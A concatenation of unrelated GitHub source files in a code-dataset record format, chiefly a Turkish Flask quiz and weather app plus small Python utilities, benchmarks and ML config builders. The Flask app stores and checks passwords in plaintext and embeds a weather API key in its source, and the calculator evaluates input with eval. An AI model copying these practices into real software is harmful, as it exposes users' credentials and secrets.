için gereklidir.\",\n option3=\"Verilerin doğruluğunu artırır ve modelin daha iyi performans göstermesini sağlar.\",\n option4=\"Veri ön işleme, projenin sonuçlarına hiçbir etki yapmaz.\",\n correct_option=3 \n )\n\n q2 = Question(\n question_text=\"Bir sinir ağı (neural network) eğitimi sırasında ikincil eksen dönüşümünün (data augmentation) temel amacı nedir?\",\n quiz_id=1,\n option1=\"Verilerin daha fazla özellikle zenginleştirilmesi.\",\n option2=\"Veri boyutunu azaltmak.\",\n option3=\"Overfitting'i (aşırı uydurma) önlemek ve modelin genelleme yapabilmesini sağlamak.\",\n option4=\"Verilerin doğruluğunu artırmak için kullanılır.\",\n correct_option=3\n )\n\n\n db.session.add_all([q1, q2])\n \n user1 = User(\n username=\"kullanici1\",\n password=\"parola1\"\n )\n\n user2 = User(\n username=\"kullanici2\",\n password=\"parola2\"\n )\n\n db.session.add_all([user1, user2])\n\n\n user_1_answer1 = UserAnswer(\n user_id=1,\n quiz_id=1,\n question_id=1,\n userOption=3\n )\n\n user_1_answer2 = UserAnswer(\n user_id=1,\n quiz_id=1,\n question_id=2,\n userOption=2\n )\n\n user_2_answer1 = UserAnswer(\n user_id=2,\n quiz_id=1,\n question_id=1,\n userOption=1\n )\n\n user_2_answer2 = UserAnswer(\n user_id=2,\n quiz_id=1,\n question_id=2,\n userOption=1\n )\n\n\n db.session.add_all([user_1_answer1, user_1_answer2, user_2_answer1, user_2_answer2])\n\n db.session.commit()\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n try:\n if request.method == 'POST':\n try:\n username = request.form['username']\n password = request.form['password']\n\n\n # Kullanıcıyı veritabanına ekleyin\n user = User(username=username, password=password)\n\n db.session.add(user)\n db.session.commit()\n except IntegrityError:\n return redirect(url_for('register_failed')) # Kullanıcı adı zaten varsa kayıt başarısız olur ileride değiştirilecek\n\n login_user(user)\n return redirect(url_for('dashboard'))\n return render_template('register.html', current_user=current_user)\n\n except :\n return redirect(url_for('register_failed'))\n\n\n@app.route('/register_failed', methods=['GET'])\ndef register_failed():\n return render_template('register_failed.html', current_user=current_user)\n\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n \n user = User.query.filter_by(username=username,password=password).first()\n\n if user:\n\n if username==user.username and password==user.password:\n login_user(user)\n return redirect(url_for('dashboard'))\n else:\n return redirect(url_for('login_failed'))\n else:\n return redirect(url_for('login_failed'))\n\n return render_template('login.html',current_user=current_user)\n\n\n@app.route('/logout', methods=['GET'])\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/dashboard')\n@login_required\ndef dashboard():\n all_quizzes = Quiz.query.all()\n quiz_results = []\n for quiz in all_quizzes:\n correct_answers = 0\n user_answers = UserAnswer.query.filter_by(user_id=current_user.id,quiz_id=quiz.id).all()\n if len(user_answers) == 0:\n pass\n else:\n for user_answer in user_answers:\n if user_answer.userOption == Question.query.get(user_answer.question_id).correct_option:\n correct_answers += 1\n\n\n quiz_results.append({\n 'quiz_name': quiz.name,\n 'score': correct_answers\n })\n\n return 
render_template('dashboard.html', quiz_results=quiz_results, current_user=current_user)\n\n\n@app.route('/login_failed', methods=['GET'])\ndef login_failed():\n return render_template('login_failed.html',current_user=current_user)\n\n\n\n@app.route('/weather', methods=['GET', 'POST'])\ndef weather():\n if request.method == 'POST':\n # HTML formundan gelen şehir adını alın\n city = request.form['city']\n\n # API'den hava durumu verilerini çekin\n url = f'http://api.weatherapi.com/v1/forecast.json?key={\"c46a7369afb341c88ba62039233008\"}&q={city}&days=3&lang=tr' # 3 günlük hava durumu verisi\n response = requests.get(url)\n\n if response.status_code == 200:\n data = response.json()\n\n # Hava durumu verilerini işleyin (örneğin, 3 günlük hava durumu)\n location = data['location']\n current = data['current']\n forecast = data['forecast']['forecastday']\n\n # Bugünkü hava durumu verileri\n current_weather = {\n 'location_name': location['name'],\n 'country': location['country'],\n 'temperature_c': current['temp_c'],\n 'temperature_f': current['temp_f'],\n 'is_day': current['is_day'],\n 'condition': current['condition']['text'],\n 'wind_speed_kph': current['wind_kph'],\n 'pressure_mb': current['pressure_mb'],\n 'precipitation_mm': current['precip_mm'],\n 'humidity': current['humidity'],\n 'cloud': current['cloud'],\n 'feelslike_c': current['feelslike_c'],\n 'feelslike_f': current['feelslike_f'],\n 'uv_index': current['uv'],\n 'gust_kph': current['gust_kph']\n }\n\n # 3 günlük hava durumu verileri\n weather_forecast = []\n\n for day_data in forecast:\n date = day_data['date']\n max_temp_c = day_data['day']['maxtemp_c']\n min_temp_c = day_data['day']['mintemp_c']\n max_temp_f = day_data['day']['maxtemp_f']\n min_temp_f = day_data['day']['mintemp_f']\n condition = day_data['day']['condition']['text']\n uv_index = day_data['day']['uv']\n \n weather_forecast.append({\n 'date': date,\n 'max_temp_c': max_temp_c,\n 'min_temp_c': min_temp_c,\n 'max_temp_f': max_temp_f,\n 'min_temp_f': min_temp_f,\n 'condition': condition,\n 'uv_index': uv_index\n })\n\n return render_template('weather.html', current_weather=current_weather, weather_forecast=weather_forecast, current_user=current_user)\n\n return render_template('weather.html', current_weather=None, weather_forecast=None, current_user=current_user)\n\n\n@app.route('/quizzes', methods=['GET', 'POST'])\ndef quizzes():\n datas=db.session.query(Quiz).all()\n return render_template('quizzes.html',quizzes=datas,current_user=current_user)\n\n\n@app.route('/quiz//', methods=['GET'])\n@login_required\ndef quiz(quiz_number,question_number):\n try:\n data=db.session.query(Question).filter(Question.quiz_id==quiz_number,Question.id==question_number).one()\n except NoResultFound:\n return redirect(url_for('quizzes'))\n else:\n question_text=data.question_text\n options=[data.option1,data.option2,data.option3,data.option4]\n return render_template('quiz.html', quiz_number=quiz_number,question_number=question_number, question_text=question_text, options=options, current_user=current_user)\n\n\n@app.route('/submit_answer', methods=['POST'])\n@login_required\ndef submit_answer():\n selected_option = request.form.get('answer')\n quiz_number = int(request.form.get('quiz_number'))\n question_number = int(request.form.get('question_number'))\n\n db.session.add(UserAnswer(user_id=current_user.id,quiz_id=quiz_number,question_id=question_number,userOption=selected_option))\n db.session.commit()\n\n 
allQuestionslen=len(db.session.query(Question).filter(Question.quiz_id==quiz_number).all())\n\n    if question_number+1 <= allQuestionslen:\n        return redirect(url_for('quiz', quiz_number=quiz_number, question_number=question_number+1))\n\n    else:\n        return redirect(url_for('dashboard'))\n\n# Function for the leaderboard\n@app.route('/leaderboard', methods=['GET'])\ndef leaderboard():\n    # Get all users\n    users = User.query.all()\n    \n    # Compute the users' scores and sort by score\n    leaderboard = []\n    for user in users:\n        user_score = calculate_user_score(user.id)\n        leaderboard.append({'username': user.username, 'score': user_score})\n    \n    leaderboard = sorted(leaderboard, key=lambda x: x['score'], reverse=True)\n    return render_template('leaderboard.html', leaderboard=enumerate(leaderboard),current_user=current_user)\n\n# Function to compute a user's score\ndef calculate_user_score(user_id):\n    # Get all of the user's answers\n    user_answers = UserAnswer.query.filter_by(user_id=user_id).all()\n    \n    # Count the user's correct and wrong answers\n    correct_answers = 0\n    wrong_answers = 0\n    \n    for answer in user_answers:\n        question = Question.query.get(answer.question_id)\n        if question.correct_option == answer.userOption:\n            correct_answers += 1\n        else:\n            wrong_answers += 1\n    \n    # Compute the score (e.g., the number of correct answers)\n    user_score = correct_answers\n    \n    return user_score","repo_name":"serhanayberkkilic/kodlandPrework","sub_path":"flaskApp/backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35326403883","text":"import sqlite3\r\nconexao = sqlite3.connect('sqlite3.dados')\r\nsql = ''' \r\nINSERT INTO fornecedores (id, nome, endereco, produto) \r\nVALUES (5, 'Padaria do Pão', 'Rua das Carnes 56', 'Pão');\r\n'''\r\ncursor = conexao.cursor()\r\ncursor.execute(sql)\r\nconexao.commit()\r\nconexao.close()\r\n","repo_name":"mourinh/DADOS-01","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19666770966","text":"# Understand the range properly; a naive guess for it did not work here.\n\n\n# Logic: given a time, check whether all cars can be repaired within it;\n# if possible, decrease the time, otherwise increase it.\n\n# Range: 1) start: at minimum there is only one car and one mechanic with rank 1, so 1 minute.\n# 2) end: at maximum there are 10^6 cars and a single mechanic with the highest possible rank, i.e. '100', repairs them all.\n\n# We use a high end of 10^14 because max(rank) = 100 and max(cars) = 10^6, so r * n * n = 100 * 10^6 * 10^6 = 10^14.\n\n# Note: when picking the range, generalise the bounds instead of reasoning from one particular case.\n\n
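# A small worked check of the bounds above (an addition, not from the original
# solution): one mechanic of rank r repairs k cars in r * k * k minutes,
# i.e. k = floor(sqrt(t / r)) cars within t minutes.
import math

def cars_repaired(rank, minutes):
    return math.isqrt(minutes // rank)  # floor(sqrt(minutes / rank))

assert cars_repaired(1, 1) == 1                         # lower bound: 1 minute suffices
assert cars_repaired(100, 100 * (10**6) ** 2) == 10**6  # upper bound 10^14 is enough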
# time: O(n*log(10^14))\n\nclass Solution:\n    def repairCars(self, ranks: List[int], cars: int) -> int:\n        \n        def isRepairPossible(minTime): # given a time, check whether all cars can be repaired within it\n            car= 0\n            for rank in ranks:\n                car+= int(math.sqrt(minTime/rank))\n            return car >= cars\n        \n        n= len(ranks)\n        start, end= 1, 100*(10**6)**2\n        while start < end:\n            mid= start + (end- start)//2\n            # print(mid)\n            if isRepairPossible(mid):\n                end= mid\n            else:\n                start= mid + 1\n        return start\n    \n\n# My mistake with the range:\n\n# start = (min(ranks) * cars**2)  # when the lowest-rank mechanic repairs all cars\n# end   = (max(ranks) * cars**2)  # when the highest-rank mechanic repairs all cars\n\n# Why is this wrong?\n# The idea is right for a single mechanic, but the other mechanics can also work in parallel\n# (any of them may be working at the same time),\n# and we cannot know in advance how many will work in parallel,\n# so this guess for the range does not hold.\n\n# When you are unsure in questions like this, just generalise the start and end values\n# (take numbers that are guaranteed lower and upper bounds).","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Binary_Search/2594. Minimum Time to Repair Cars.py","file_name":"2594. Minimum Time to Repair Cars.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"21686129754","text":"import asyncio\nimport pickle\n\nfrom fructosa.fructosad import FructosaD\nfrom fructosa.conf import LAgentConf\nfrom fructosa.constants import (\n    PROTO_STARTING_PROGRAM_MSG, PROTO_STOPPED_PROGRAM_MSG, PROTO_CANT_STOP_MSG,\n    START_STOP_ERROR, NOT_RUNNING_MESSAGE, LAGENT_PROGRAM, PROTO_MEASUREMENT_MSG,\n    LAGENT_TO_LMASTER_DATA_PORT_KEY, LMASTER_HOST_KEY,\n    LAGENT_TO_LMASTER_CONNECTING_MSG, LAGENT_TO_LMASTER_CONNECTED_MSG,\n    HEARTBEAT_START_SENDING_MSG_TEMPLATE, HEARTBEAT_PORT, HEARTBEAT_INTERVAL_SECONDS, # 
?\n # self.logger.info( # ?\n # HEARTBEAT_START_SENDING_MSG_TEMPLATE.format( # ?\n # master=host, hb_port=port # ?\n # ) # ?\n # ) # ?\n # hb_proto_factory = HeartbeatProtocolFactory(\n # HeartbeatClientProtocol, self._conf.logging) # ?\n # while True: # ?\n # await self._send_one_heartbeat(hb_proto_factory, host, port)\n\n # async def _send_one_heartbeat(self, factory, host, port):\n # transport, protocol = await self._event_loop.create_datagram_endpoint(\n # factory, remote_addr=(host, port)\n # )\n # # try: # ?\n # # await protocol.on_sent # ?\n # # finally: # ?\n # # transport.close() # ?\n # # await asyncio.sleep(HEARTBEAT_INTERVAL_SECONDS) # ?\n\n async def send_to_master(self):\n \"\"\"This coroutine is not used for now since the data are sent to \n Graphite directly.\n It remains here in case it is used in the future (or a variation of it)\n \"\"\"\n host = self._conf.lmaster[LMASTER_HOST_KEY]\n port = self._conf.lmaster[LAGENT_TO_LMASTER_DATA_PORT_KEY]\n self.logger.info(\n LAGENT_TO_LMASTER_CONNECTING_MSG.format(\n host_key=LMASTER_HOST_KEY, host=host,\n port_key=LAGENT_TO_LMASTER_DATA_PORT_KEY, port=port,\n )\n )\n reader, writer = await asyncio.open_connection(\n host, port, loop=self._event_loop,\n )\n self.logger.info(LAGENT_TO_LMASTER_CONNECTED_MSG)\n while True:\n message = await self._to_master_queue.get()\n writer.write(message)\n #writer.close()# not needed (?) review the protocol; is this correct?\n # # I think I should factorize this functionality in a client class\n\ndef main():\n generic_main(LAgentConf, LAgent)\n","repo_name":"palao/FrUCToSA","sub_path":"fructosa/lagent.py","file_name":"lagent.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28945734880","text":"from json import load\n\nimport lzma\nimport zlib\nfrom time import time\n\nclass CompressionTest:\n def __init__(self):\n self.load_data()\n self.run_lzma()\n self.run_zlib()\n\n def load_data(self):\n f = open(\"json_data.txt\", \"r\")\n self.data = load(f)\n self.raw_data = str(self.data).encode('utf-8')\n f.close()\n\n def get_data(self):\n return self.data\n\n def run_lzma(self):\n start = time()\n self.lzma_compressed = lzma.compress(self.raw_data)\n self.lzma_compress_time = time() - start\n\n start = time()\n lzma.decompress(self.lzma_compressed)\n self.lzma_decompress_time = time() - start\n\n def run_zlib(self):\n start = time()\n self.zlib_compressed = zlib.compress(self.raw_data)\n self.zlib_compress_time = time() - start\n\n start = time()\n zlib.decompress(self.zlib_compressed)\n self.zlib_decompress_time = time() - start\n\n def print_stats(self):\n print(\"Data Length (objs):\", len(self.data))\n print(\"Data Length (bytes):\", len(self.raw_data))\n\n print(\"LZMA Compressed Length:\", len(self.lzma_compressed))\n print(\"ZLib Compressed Length:\", len(self.zlib_compressed))\n\n print(\"LZMA Compress Time:\", self.lzma_compress_time)\n print(\"ZLib Compress Time:\", self.zlib_compress_time)\n\n print(\"LZMA Decompress Time:\", self.lzma_decompress_time)\n print(\"ZLib Decompress Time:\", self.zlib_decompress_time)\n\n print(\"\")\n print(\"LZMA Compression Ratio:\", 1.0 - float(len(self.lzma_compressed))/float(len(self.raw_data)))\n print(\"ZLib Compression Ratio:\", 1.0 - float(len(self.zlib_compressed))/float(len(self.raw_data)))\n\n\ndef main():\n ct = CompressionTest()\n ct.print_stats()\n\nif __name__ == \"__main__\": 
main()","repo_name":"mattjegan/CompressionBenchmarks","sub_path":"compression_test.py","file_name":"compression_test.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27876279575","text":"\"\"\"24.36. Скласти програму з графічним інтерфейсом для \r\nреалізації простого калькулятора. Калькулятор повинен мати \r\nнабір кнопок для введення цифр та арифметичних дій а також \r\nвікно для виведення результату як на рисунку нижче.\"\"\"\r\n\r\nfrom tkinter import *\r\n\r\nclass CalculatorGui:\r\n\r\n def __init__(self, form):\r\n self.equation = ''\r\n self.frame = form\r\n self.frame.title('Calculator')\r\n self.def_font = ('arial', 16)\r\n\r\n self.operators = ['C', '**', 'sqrt', '/', '*', '+', '-']\r\n self.symbs = ['C', '^', 'sqrt', '/', 7, 8, 9, '*', 4, 5, 6, '+', 1, 2, 3, '-', 0, '=']\r\n\r\n self.ans_label = Label(self.frame, font=self.def_font)\r\n self.ans_label.grid(row=0, column=0, columnspan=4)\r\n self.frame.grid_rowconfigure(0, weight=1)\r\n for symb in self.symbs:\r\n self.create_button(symb, 1+self.symbs.index(symb)//4, self.symbs.index(symb)%4)\r\n\r\n def create_button(self, name, i, j):\r\n self.symb_button = Button(self.frame, font=self.def_font, text=name, width=3, \r\n command=lambda name=name: self.operation(name))\r\n self.frame.grid_rowconfigure(i, weight=1)\r\n self.frame.grid_columnconfigure(j, weight=1)\r\n self.symb_button.grid(row=i, column=j, sticky='nsew')\r\n if name == '=':\r\n self.symb_button.grid(columnspan=3)\r\n\r\n def operation(self, name):\r\n if name == '+' and self.equation[-1] not in self.operators:\r\n self.equation += '+'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '-' and self.equation[-1] not in self.operators:\r\n self.equation += '-'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '*' and self.equation[-1] not in self.operators:\r\n self.equation += '*'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '/' and self.equation[-1] not in self.operators:\r\n self.equation += '/'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '^' and self.equation[-1] not in self.operators:\r\n self.equation += '**'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == 'sqrt' and self.equation[-1] not in self.operators:\r\n self.equation += '**(1/2)'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == 'C':\r\n self.equation = ''\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '=' and self.equation[-1] not in self.operators:\r\n self.equation = str(eval(self.equation))\r\n self.ans_label.configure(text=self.equation)\r\n \r\n for num in range(10):\r\n if num == name:\r\n self.equation += str(name)\r\n self.ans_label.configure(text=self.equation)\r\n \r\nif __name__ == '__main__':\r\n top = Tk()\r\n calculator = CalculatorGui(top)\r\n top.mainloop()","repo_name":"CrazyDuck192/PythonTasks","sub_path":"24.36.py","file_name":"24.36.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14975392042","text":"import os\nimport os.path\n\nimport templar\nimport utils\n\n\nclass YumGen:\n\n def __init__(self, collection_mgr):\n \"\"\"\n Constructor\n \"\"\"\n self.collection_mgr = collection_mgr\n self.api = collection_mgr.api\n self.distros = collection_mgr.distros()\n self.profiles = collection_mgr.profiles()\n self.systems = collection_mgr.systems()\n 
self.settings = collection_mgr.settings()\n self.repos = collection_mgr.repos()\n self.templar = templar.Templar(collection_mgr)\n\n def get_yum_config(self, obj, is_profile):\n \"\"\"\n Return one large yum repo config blob suitable for use by any target system that requests it.\n \"\"\"\n\n totalbuf = \"\"\n\n blended = utils.blender(self.api, False, obj)\n\n input_files = []\n\n # tack on all the install source repos IF there is more than one.\n # this is basically to support things like RHEL5 split trees\n # if there is only one, then there is no need to do this.\n\n included = {}\n for r in blended[\"source_repos\"]:\n filename = self.settings.webdir + \"/\" + \"/\".join(r[0].split(\"/\")[4:])\n if filename not in included:\n input_files.append(filename)\n included[filename] = 1\n\n for repo in blended[\"repos\"]:\n path = os.path.join(self.settings.webdir, \"repo_mirror\", repo, \"config.repo\")\n if path not in included:\n input_files.append(path)\n included[path] = 1\n\n for infile in input_files:\n try:\n infile_h = open(infile)\n except:\n # file does not exist and the user needs to run reposync\n # before we will use this, cobbler check will mention\n # this problem\n totalbuf += \"\\n# error: could not read repo source: %s\\n\\n\" % infile\n continue\n\n infile_data = infile_h.read()\n infile_h.close()\n outfile = None # disk output only\n totalbuf += self.templar.render(infile_data, blended, outfile, None)\n totalbuf += \"\\n\\n\"\n\n return totalbuf\n","repo_name":"shenson/cobbler","sub_path":"cobbler/yumgen.py","file_name":"yumgen.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"25981193414","text":"import time\nimport time\nimport struct\nimport smbus2\nimport pi_steer.debug as db\n\n_CONVERSION_REGISTER = 0x00\n_CONFIG_REGISTER = 0x01\n_CONFIGURATION = 0b0100_0100_1010_0011\n\nclass ADS1115():\n def __init__(self, address, debug=False):\n self.i2c = smbus2.SMBus(1)\n self.address = address \n self.debug = debug\n\n self.i2c.write_i2c_block_data(self.address, _CONFIG_REGISTER, [0b0100_0010, 0b1010_0011])\n time.sleep(0.1)\n if debug:\n db.write('ADS1115 configuration {}'.format(self.i2c.read_i2c_block_data(self.address, _CONFIG_REGISTER, 2)))\n\n def read(self):\n data = self.i2c.read_i2c_block_data(self.address, _CONVERSION_REGISTER, 2)\n return struct.unpack('>h', bytes(data) )[0]\n","repo_name":"salmiac/pi-steer","sub_path":"pi-steer/pi_steer/ads1115.py","file_name":"ads1115.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"21526246829","text":"# coding: utf-8\nimport time\nimport pymysql.cursors\nfrom profilehooks import profile\n\n\n@profile\ndef insert_to_mysql(connection, n, start):\n try:\n with connection.cursor() as cursor:\n for i in xrange(n):\n sql = \"INSERT INTO `ab3` (`a`, `b`) VALUES (%s, %s)\"\n cursor.execute(sql, (str(i) + str(start), str(start) + str(i)))\n connection.commit()\n\n finally:\n connection.close()\n\n\n\ndef main():\n connection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='testdb',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n start = int(time.time())\n insert_to_mysql(connection, 10000, start)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"binderclip/code-snippets-python","sub_path":"packages/mysql_snippets/batch_insert_performance.py","file_name":"batch_insert_performance.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"73110168080","text":"import argparse\nfrom distutils.command.build import build\nfrom signal import default_int_handler\n\nimport yaml\nfrom ml_collections import config_dict\n\n\"\"\" NEW RULES\n1) each class has a dedicated builder/cfg\n2) every class cfg variable is explicitly assigned\n3) variables that determine conditionals must be defined globally in main, \n OR must be passed as an inline parameter to a cfg builder\n4) \n\"\"\"\n\n\ndef build_wm_cfg(**kwargs):\n encoder_config = config_dict.ConfigDict()\n encoder_config.image_channels = kwargs.get(\"image_channels\", 1)\n encoder_config.cnn_depth = kwargs.get(\"cnn_depth\", 48)\n\n rssm_config = config_dict.ConfigDict()\n # rssm_config.action_dim = 4\n rssm_config.deter_dim = kwargs.get(\"deter_dim\", 1024)\n rssm_config.embed_dim = encoder_config.cnn_depth*32\n rssm_config.stoch_dim = kwargs.get(\"stoch_dim\", 32)\n rssm_config.stoch_rank = kwargs.get(\"stoch_rank\", 32)\n rssm_config.hidden_dim = kwargs.get(\"hidden_dim\", 1000)\n rssm_config.gru_layers = kwargs.get(\"gru_layers\", 1)\n\n decoder_config = config_dict.ConfigDict()\n decoder_config.image_channels = encoder_config.image_channels\n decoder_config.image_weight = kwargs.get(\"image_weight\", 2.0)\n decoder_config.cnn_depth = encoder_config.cnn_depth\n\n wm_config = config_dict.ConfigDict()\n wm_config.encoder_config = encoder_config\n wm_config.rssm_config = rssm_config\n wm_config.decoder_config = decoder_config\n wm_config.kl_balance = kwargs.get(\"kl_balance\", 0.8)\n wm_config.kl_weight = kwargs.get(\"kl_weight\", 0.1)\n wm_config.features_dim = rssm_config.deter_dim + \\\n rssm_config.stoch_dim*rssm_config.stoch_rank\n\n return wm_config\n\n\ndef build_rssm_trainer_config(env_name, train_device, **kwargs):\n optimizer = config_dict.ConfigDict()\n optimizer.lr = kwargs.get(\"lr\", 3e-4)\n optimizer.eps = kwargs.get(\"eps\", 1e-5)\n\n checkpoints = config_dict.ConfigDict()\n checkpoints.do_checkpoint = kwargs.get(\"do_checkpoint\", True)\n checkpoints.savepoints = [1000, 5000, 10000, 50000,\n 100000, 200000, 500000, 1000000, 1500000, 2000000]\n checkpoints.path = \"../checkpoints/bipedalwalker/\" if env_name == \"bipedalwalker\" else \"../checkpoints/breakout/\"\n\n validation = config_dict.ConfigDict()\n validation.do_val = kwargs.get(\"do_val\", True)\n validation.seq_len = kwargs.get(\"val_seq_len\", 50)\n validation.batch_size = kwargs.get(\"val_batch_len\", 128)\n\n trainer_config = config_dict.ConfigDict()\n trainer_config.checkpoints = checkpoints\n trainer_config.validation = validation\n trainer_config.seq_len = kwargs.get(\"train_seq_len\", 50)\n trainer_config.batch_size = kwargs.get(\"train_batch_len\", 50)\n trainer_config.train_device = train_device\n\n return trainer_config\n\n\ndef build_featurizer_cfg(wm_cfg, env_name):\n featurizer_cfg = config_dict.ConfigDict()\n featurizer_cfg.wm_cfg = wm_cfg\n featurizer_cfg.update(build_dataset_cfg(env_name))\n featurizer_cfg.seq_len = 1\n featurizer_cfg.batch_size = 500\n return featurizer_cfg\n\n\ndef build_dataset_cfg(env_name):\n dataset_cfg = config_dict.ConfigDict()\n dataset_cfg.data_keys = [\"action\", \"obs\", \"reset\"]\n if env_name == \"breakout\":\n dataset_cfg.pixel_mean = 33.0\n 
dataset_cfg.pixel_std = 55.0\n dataset_cfg.action_type = \"discrete\"\n\n elif env_name == \"bipedalwalker\":\n dataset_cfg.pixel_mean = 210.0\n dataset_cfg.pixel_std = 48.0\n dataset_cfg.action_type = \"continuous\"\n dataset_cfg.batch_size = 50\n dataset_cfg.seq_length = 50\n # the original had no return, so build_featurizer_cfg's update() call\n # received None and crashed\n return dataset_cfg\n\n\ndef build_ac_trainer_cfg(env_name, args, ac_dataset_cfg):\n ac_trainer_config = config_dict.ConfigDict()\n # should split this up by trainer and policy classes\n ac_trainer_config.lr = 3e-4\n ac_trainer_config.gamma = 0.95\n ac_trainer_config.layers = 8\n ac_trainer_config.entropy = 0.003\n ac_trainer_config.use_sb3 = args.use_sb3\n ac_trainer_config.wm_path = ac_dataset_cfg.wm_path\n ac_trainer_config.actor_dist = \"onehot\"\n ac_trainer_config.actor_grad = \"reinforce\"\n ac_trainer_config.batch_size = 512\n ac_trainer_config.seq_length = 15\n ac_trainer_config.hidden_dim = 256\n ac_trainer_config.lambda_gae = 0.95\n\n ac_trainer_config.imag_horizon = 15\n ac_trainer_config.action_dim = 4\n\n ac_trainer_config.load_device = args.load_device\n ac_trainer_config.train_device = args.train_device\n\n ac_trainer_config.do_checkpoint = True\n ac_trainer_config.checkpoint_path = \"../checkpoints/breakout/\" if env_name == \"breakout\" else \"../checkpoints/bipedalwalker/\"\n ac_trainer_config.target_interval = 100\n\n validation = config_dict.ConfigDict()\n validation.n_games = 12\n validation.n_envs = 12\n ac_trainer_config.validation = validation\n return ac_trainer_config\n\n\ndef build_ac_dataset_cfg(env_name, use_sb3):\n ac_dataset_cfg = config_dict.ConfigDict()\n if env_name == \"breakout\":\n if use_sb3:\n ac_dataset_cfg.wm_path = \"../checkpoints/breakout/sb3/sb3-model-1000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"../data/breakout/sb3-features-cached.npz\"\n else:\n ac_dataset_cfg.wm_path = \"../checkpoints/breakout/d4rl/model-1000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"./data/breakout/exp-v2-cached.npz\"\n elif env_name == \"bipedalwalker\":\n ac_dataset_cfg.wm_path = \"../checkpoints/bipedalwalker/model-2000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"../data/bipedalwalker/sb3-features-cached.npz\"\n ac_dataset_cfg.episode_limit = 100\n # the next three fields were bare expressions in the original (they raise an\n # AttributeError on a ConfigDict); None placeholders are an assumption and\n # must be filled in by the caller\n ac_dataset_cfg.seq_length = None\n ac_dataset_cfg.load_device = None\n ac_dataset_cfg.use_cached_features = None\n return ac_dataset_cfg\n\n\ndef build_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_device', default=\"cuda:0\")\n parser.add_argument('--load_device', default=\"cpu\")\n parser.add_argument(\"--env_name\", default=\"breakout\")\n parser.add_argument(\"--use_d4rl\", dest=\"use_sb3\",\n action=\"store_false\") # this defaults to use_sb3 == True\n return parser.parse_args()\n\n\ndef main():\n args = build_args()\n cfg = config_dict.ConfigDict()\n cfg.wm_config = build_wm_cfg()\n # build_ac_dataset_cfg takes (env_name, use_sb3); the original also passed\n # cfg.wm_config, which does not match the signature\n cfg.ac_dataset_config = build_ac_dataset_cfg(args.env_name, use_sb3=args.use_sb3)
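\n\n\n# Hypothetical usage sketch (added; not part of the original file) showing how\n# the builders above compose. The keyword values are illustrative assumptions.\n#\n# args = build_args()\n# cfg = config_dict.ConfigDict()\n# cfg.wm_config = build_wm_cfg(cnn_depth=48, stoch_dim=32)\n# cfg.rssm_trainer_config = build_rssm_trainer_config(args.env_name, args.train_device)\n# cfg.ac_dataset_config = build_ac_dataset_cfg(args.env_name, use_sb3=args.use_sb3)\n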
print(f\"{name_of_movie} is with highest rating: {rating}\")\nelse:\n print(f\"{name_of_movie} is with lowest rating: {rating}\")\naverage_rating = total_rating / number_of_films\nprint(f\"{average_rating:.2}\")","repo_name":"SilviaGadzhalova/SoftUni-Python-Basic_2021_09","sub_path":"exam/movie_rating.py","file_name":"movie_rating.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4375839786","text":"import os\nimport sys\n\nsys.path.append(os.path.curdir)\nimport tensorflow as tf\nimport pandas as pd\nimport sys\nimport tensorflow.keras.backend as K\nimport argparse\nimport pickle\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-lr\", type=float, help='Learning rate',default = 1e-3)\nparser.add_argument(\"-bs\", type=int, help='batch_size', default= 32)\nparser.add_argument(\"-p\", type=float, help='loss constraint for covariance learning',default = 1e-3)\nparser.add_argument(\"-S\", type=int, help='cell_size',default=16)\nparser.add_argument(\"-epochs\", type=int, help='number of epochs',default=20)\nparser.add_argument(\"-f\", \"--fff\", help=\"a dummy argument to fool ipython\", default=\"1\")\nparsarg = vars(parser.parse_args())\n\n\n################################### HYPERPARAMETERS ###########################################################\n\n\n\nproba_near = 1 / 3\nproba_far = 1 / 3\nproba_same = 1 / 3\n\nbatch_size = parsarg.get('bs')\nnb_epoch = parsarg.get('epochs')\nlr = 